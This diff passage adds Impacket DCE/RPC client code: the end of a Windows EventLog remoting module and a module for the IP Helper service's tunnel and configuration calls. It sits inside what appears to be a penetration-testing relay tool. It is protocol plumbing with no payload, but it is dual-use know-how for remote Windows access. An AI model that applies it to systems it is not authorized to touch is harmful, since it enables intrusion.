+class CDWORD_ARRAY(NDRUniConformantArray):
+    item = DWORD
+
+class LPBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', CBYTE_ARRAY)
+    )
+
+class ULONG_ARRAY(NDRUniVaryingArray):
+    item = ULONG
+
+# 2.3.1 EVENT_DESCRIPTOR
+class EVENT_DESCRIPTOR(NDRSTRUCT):
+    structure = (
+        ('Id', WORD),
+        ('Version', BYTE),
+        ('Channel', BYTE),
+        ('LevelSeverity', BYTE),
+        ('Opcode', BYTE),
+        ('Task', WORD),
+        ('Keyword', ULONG),
+    )
+
+class BOOKMARK(NDRSTRUCT):
+    structure = (
+        ('BookmarkSize', DWORD),
+        ('HeaderSize', '<L=0x18'),
+        ('ChannelSize', DWORD),
+        ('CurrentChannel', DWORD),
+        ('ReadDirection', DWORD),
+        ('RecordIdsOffset', DWORD),
+        ('LogRecordNumbers', ULONG_ARRAY),
+    )
+
+
+#2.2.17 RESULT_SET
+class RESULT_SET(NDRSTRUCT):
+    structure = (
+        ('TotalSize', DWORD),
+        ('HeaderSize', DWORD),
+        ('EventOffset', DWORD),
+        ('BookmarkOffset', DWORD),
+        ('BinXmlSize', DWORD),
+        ('EventData', BYTE_ARRAY),
+        #('NumberOfSubqueryIDs', '<L=0'),
+        #('SubqueryIDs', BYTE_ARRAY),
+        #('BookMarkData', BOOKMARK),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+class EvtRpcRegisterLogQuery(NDRCALL):
+    opnum = 5
+    structure = (
+        ('Path', LPWSTR),
+        ('Query', WSTR),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcRegisterLogQueryResponse(NDRCALL):
+    structure = (
+        ('Handle', CONTEXT_HANDLE_LOG_QUERY),
+        ('OpControl', CONTEXT_HANDLE_OPERATION_CONTROL),
+        ('QueryChannelInfoSize', DWORD),
+        ('QueryChannelInfo', EvtRpcQueryChannelInfoArray),
+        ('Error', RPC_INFO),
+        )
+
+class EvtRpcQueryNext(NDRCALL):
+    opnum = 11
+    structure = (
+        ('LogQuery', CONTEXT_HANDLE_LOG_QUERY),
+        ('NumRequestedRecords', DWORD),
+        ('TimeOutEnd', DWORD),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcQueryNextResponse(NDRCALL):
+    structure = (
+        ('NumActualRecords', DWORD),
+        ('EventDataIndices', DWORD_ARRAY),
+        ('EventDataSizes', DWORD_ARRAY),
+        ('ResultBufferSize', DWORD),
+        ('ResultBuffer', BYTE_ARRAY),
+        ('ErrorCode', ULONG),
+    )
+
+class EvtRpcQuerySeek(NDRCALL):
+    opnum = 12
+    structure = (
+        ('LogQuery', CONTEXT_HANDLE_LOG_QUERY),
+        ('Pos', LARGE_INTEGER),
+        ('BookmarkXML', LPWSTR),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcQuerySeekResponse(NDRCALL):
+    structure = (
+        ('Error', RPC_INFO),
+    )
+
+class EvtRpcClose(NDRCALL):
+    opnum = 13
+    structure = (
+        ("Handle", CONTEXT_HANDLE_LOG_HANDLE),
+    )
+
+class EvtRpcCloseResponse(NDRCALL):
+    structure = (
+        ("Handle", PCONTEXT_HANDLE_LOG_HANDLE),
+        ('ErrorCode', ULONG),
+    )
+
+class EvtRpcOpenLogHandle(NDRCALL):
+    opnum = 17
+    structure = (
+        ('Channel', WSTR),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcOpenLogHandleResponse(NDRCALL):
+    structure = (
+        ('Handle', PCONTEXT_HANDLE_LOG_HANDLE),
+        ('Error', RPC_INFO),
+    )
+
+class EvtRpcGetChannelList(NDRCALL):
+    opnum = 19
+    structure = (
+        ('Flags', DWORD),
+    )
+
+class EvtRpcGetChannelListResponse(NDRCALL):
+    structure = (
+        ('NumChannelPaths', DWORD),
+        ('ChannelPaths', WSTR_ARRAY),
+        ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+
+OPNUMS = {
+    5   : (EvtRpcRegisterLogQuery, EvtRpcRegisterLogQueryResponse),
+    11  : (EvtRpcQueryNext,  EvtRpcQueryNextResponse),
+    12  : (EvtRpcQuerySeek, EvtRpcQuerySeekResponse),
+    13  : (EvtRpcClose, EvtRpcCloseResponse),
+    17  : (EvtRpcOpenLogHandle, EvtRpcOpenLogHandle),
+    19  : (EvtRpcGetChannelList, EvtRpcGetChannelListResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+
+def hEvtRpcRegisterLogQuery(dce, path, flags, query='*\x00'):
+    request = EvtRpcRegisterLogQuery()
+
+    request['Path'] = path
+    request['Query'] = query
+    request['Flags'] = flags
+    resp = dce.request(request)
+    return resp
+
+def hEvtRpcQueryNext(dce, handle, numRequestedRecords, timeOutEnd=1000):
+    request = EvtRpcQueryNext()
+
+    request['LogQuery'] = handle
+    request['NumRequestedRecords'] = numRequestedRecords
+    request['TimeOutEnd'] = timeOutEnd
+    request['Flags'] = 0
+    status = system_errors.ERROR_MORE_DATA
+    resp = dce.request(request)
+    while status == system_errors.ERROR_MORE_DATA:
+        try:
+            resp = dce.request(request)
+        except DCERPCException as e:
+            if str(e).find('ERROR_NO_MORE_ITEMS') < 0:
+                raise
+            elif str(e).find('ERROR_TIMEOUT') < 0:
+                raise
+            resp = e.get_packet()
+        return resp
+
+def hEvtRpcClose(dce, handle):
+    request = EvtRpcClose()
+    request['Handle'] = handle
+    resp = dce.request(request)
+    return resp
+
+def hEvtRpcOpenLogHandle(dce, channel, flags):
+    request = EvtRpcOpenLogHandle()
+
+    request['Channel'] = channel
+    request['Flags'] = flags
+    return dce.request(request)
+
+def hEvtRpcGetChannelList(dce):
+    request = EvtRpcGetChannelList()
+
+    request['Flags'] = 0
+    resp = dce.request(request)
+    return resp

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/iphlp.py

@@ -0,0 +1,172 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Authors:
+#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#
+# Description:
+#  Implementation of iphlpsvc.dll MSRPC calls (Service that offers IPv6 connectivity over an IPv4 network)
+
+from socket import inet_aton
+
+from impacket import uuid
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.dtypes import BYTE, ULONG, WSTR, GUID, NULL
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_IPHLP_IP_TRANSITION   = uuidtup_to_bin(('552d076a-cb29-4e44-8b6a-d15e59e2c0af', '1.0'))
+
+# RPC_IF_ALLOW_LOCAL_ONLY
+MSRPC_UUID_IPHLP_TEREDO          = uuidtup_to_bin(('ecbdb051-f208-46b9-8c8b-648d9d3f3944', '1.0'))
+MSRPC_UUID_IPHLP_TEREDO_CONSUMER = uuidtup_to_bin(('1fff8faa-ec23-4e3f-a8ce-4b2f8707e636', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'IPHLP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'IPHLP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+# Notification types
+NOTIFICATION_ISATAP_CONFIGURATION_CHANGE               = 0
+NOTIFICATION_PROCESS6TO4_CONFIGURATION_CHANGE          = 1
+NOTIFICATION_TEREDO_CONFIGURATION_CHANGE               = 2
+NOTIFICATION_IP_TLS_CONFIGURATION_CHANGE               = 3
+NOTIFICATION_PORT_CONFIGURATION_CHANGE                 = 4
+NOTIFICATION_DNS64_CONFIGURATION_CHANGE                = 5
+NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX = 6
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# Opnum 0
+class IpTransitionProtocolApplyConfigChanges(NDRCALL):
+    opnum = 0
+    structure = (
+       ('NotificationNum', BYTE),
+    )
+
+class IpTransitionProtocolApplyConfigChangesResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# Opnum 1
+class IpTransitionProtocolApplyConfigChangesEx(NDRCALL):
+    opnum = 1
+    structure = (
+       ('NotificationNum', BYTE),
+       ('DataLength', ULONG),
+       ('Data', BYTE_ARRAY),
+    )
+
+class IpTransitionProtocolApplyConfigChangesExResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# Opnum 2
+class IpTransitionCreatev6Inv4Tunnel(NDRCALL):
+    opnum = 2
+    structure = (
+       ('LocalAddress', "4s=''"),
+       ('RemoteAddress', "4s=''"),
+       ('InterfaceName', WSTR),
+    )
+
+class IpTransitionCreatev6Inv4TunnelResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# Opnum 3
+class IpTransitionDeletev6Inv4Tunnel(NDRCALL):
+    opnum = 3
+    structure = (
+       ('TunnelGuid', GUID),
+    )
+
+class IpTransitionDeletev6Inv4TunnelResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+
+OPNUMS = {
+ 0 : (IpTransitionProtocolApplyConfigChanges, IpTransitionProtocolApplyConfigChangesResponse),
+ 1 : (IpTransitionProtocolApplyConfigChangesEx, IpTransitionProtocolApplyConfigChangesExResponse),
+ 2 : (IpTransitionCreatev6Inv4Tunnel, IpTransitionCreatev6Inv4TunnelResponse),
+ 3 : (IpTransitionDeletev6Inv4Tunnel, IpTransitionDeletev6Inv4TunnelResponse)
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+# For all notifications except EX
+def hIpTransitionProtocolApplyConfigChanges(dce, notification_num):
+    request = IpTransitionProtocolApplyConfigChanges()
+    request['NotificationNum'] = notification_num
+
+    return dce.request(request)
+
+# Only for NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX
+# No admin required
+def hIpTransitionProtocolApplyConfigChangesEx(dce, notification_num, notification_data):
+    request = IpTransitionProtocolApplyConfigChangesEx()
+    request['NotificationNum'] = notification_num
+    request['DataLength'] = len(notification_data)
+    request['Data'] = notification_data
+
+    return dce.request(request)
+
+# Same as netsh interface ipv6 add v6v4tunnel "Test Tunnel" 192.168.0.1 10.0.0.5
+def hIpTransitionCreatev6Inv4Tunnel(dce, local_address, remote_address, interface_name):
+    request = IpTransitionCreatev6Inv4Tunnel()
+    request['LocalAddress'] = inet_aton(local_address)
+    request['RemoteAddress'] = inet_aton(remote_address)
+
+    request['InterfaceName'] = checkNullString(interface_name)
+    request.fields['InterfaceName'].fields['MaximumCount'] = 256
+
+    return dce.request(request)
+
+def hIpTransitionDeletev6Inv4Tunnel(dce, tunnel_guid):
+    request = IpTransitionDeletev6Inv4Tunnel()
+    request['TunnelGuid'] = uuid.string_to_bin(tunnel_guid)
+
+    return dce.request(request)